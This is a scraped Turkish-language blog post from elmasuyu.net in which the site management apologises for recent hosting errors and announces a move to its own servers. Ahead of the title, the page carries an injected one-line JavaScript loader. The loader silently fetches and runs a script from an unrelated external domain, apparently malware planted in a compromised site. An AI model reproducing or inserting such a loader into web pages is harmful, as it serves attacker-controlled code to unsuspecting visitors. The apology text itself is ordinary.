;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Özür - elmasuyu.net
Kategoriler
Etkinlik Haber

Özür

Sitemiz son bir ay içerisinde bir takım teknik aksaklıklarla boğuşmaktaydı ve bu yüzden de yukarıdaki ekran görüntüsünde de göründüğü gibi bazen “Hesap Aslıya Alındı” hataları ile karşılaşmaktaydınız. Uzun süredir sunucular konusunda bize yardımcı olan Photoshop Magazin ailesine bu zamana kadar olan yardımlarından dolayı teşekkür ediyoruz lakin yaşamış olduğumuz bazı aksaklıklar nedeniyle artık kendi sunucularımız üzerinde cirit atmaya devam edeceğiz. Sizlere daha iyi hizmet sunabilmek için son bir aydır geceli gündüzlü çalışarak kayıpsız yola devam ediyoruz. Bu süre zarfında Apple cephesinde çok gelişme oldu ve sizleri haberdar edemedik ama olsun bunun telafisini sonradan yapacağız. Bu geçici teknik arızadan ötürü başta değerli üyelerimiz olmak üzere bütün ziyaretçilerimizden özür dileriz.

Saygılarımızla,

ElmaSuyu.Net Yönetimi

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner